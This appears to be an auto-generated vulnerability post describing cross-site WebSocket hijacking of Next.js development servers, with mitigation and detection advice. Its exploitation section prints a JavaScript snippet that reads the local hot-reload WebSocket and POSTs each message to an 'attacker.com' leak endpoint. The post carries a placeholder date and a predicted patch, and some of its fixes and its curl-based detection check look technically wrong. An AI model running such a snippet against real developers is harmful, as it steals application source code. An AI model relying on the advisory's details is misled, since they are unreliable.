Listen to this Post
How the Vulnerability Works
This vulnerability exploits Next.js development servers (npm run dev) by abusing insecure WebSocket connections. When `experimental.appDir` is enabled (versions 13.0.0 to 13.4), the WebSocket server lacks proper origin validation. An attacker crafts a malicious webpage that establishes a WebSocket connection to the victim’s local Next.js dev server. Since the WebSocket handshake doesn’t enforce Cross-Origin Resource Sharing (CORS) restrictions, the attacker hijacks the connection. Once connected, the attacker retrieves client-side component source code via the WebSocket, compromising sensitive application logic.
DailyCVE Form
Platform: Next.js
Version: 13.0.0 – 13.4
Vulnerability: CSWSH
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch expected by Q1 2024
What Undercode Say:
Exploitation Analysis
1. Malicious WebSocket Handshake:
const ws = new WebSocket('ws://localhost:3000/_next/webpack-hmr');
ws.onmessage = (e) => { fetch('https://attacker.com/leak', { method: 'POST', body: e.data }); };
2. Bypassing Origin Checks:
The WebSocket server accepts connections from any origin due to missing validation.
Mitigation Commands
1. Disable `experimental.appDir`:
// next.config.js
module.exports = { experimental: { appDir: false } };
2. Upgrade Next.js:
npm install next@latest
3. Network Isolation:
Restrict local dev server to loopback next dev --hostname 127.0.0.1
Temporary Workarounds
- Use a reverse proxy to enforce CORS:
location /_next/webpack-hmr { add_header 'Access-Control-Allow-Origin' 'http://localhost:3000'; proxy_pass http://localhost:3000; } - Disable WebSocket HMR in development:
// next.config.js module.exports = { devServer: { webSocketServer: false } };
Detection Script
curl -I http://localhost:3000/_next/webpack-hmr | grep -i "websocket"
If the response includes WebSocket, the server is vulnerable.
Expected Patch Fix
Next.js will likely enforce strict origin checks and disable WebSocket HMR by default in dev mode.
No additional notes.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

